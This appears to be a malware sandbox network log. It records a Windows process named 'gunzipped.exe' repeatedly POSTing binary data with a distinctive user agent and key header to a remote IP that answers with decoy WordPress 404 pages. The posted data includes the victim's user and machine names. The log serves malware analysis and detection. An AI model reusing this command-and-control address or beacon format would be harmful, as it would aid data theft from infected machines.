                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:03.793889046 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:03.793930054 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:03.793967962 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:03.794008017 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:03.794054985 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:03.794095993 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:03.794138908 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:03.794178963 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:03.794223070 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          47192.168.2.549760136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:04.154071093 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:04.357484102 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:05.294157982 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:04 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:05.294225931 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:05.294266939 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:05.294305086 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:05.294348955 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:05.294390917 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:05.294435024 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:05.294476032 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:05.294516087 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:05.294559002 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          48192.168.2.549761136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:05.666466951 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:05.874942064 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:06.803118944 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:05 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 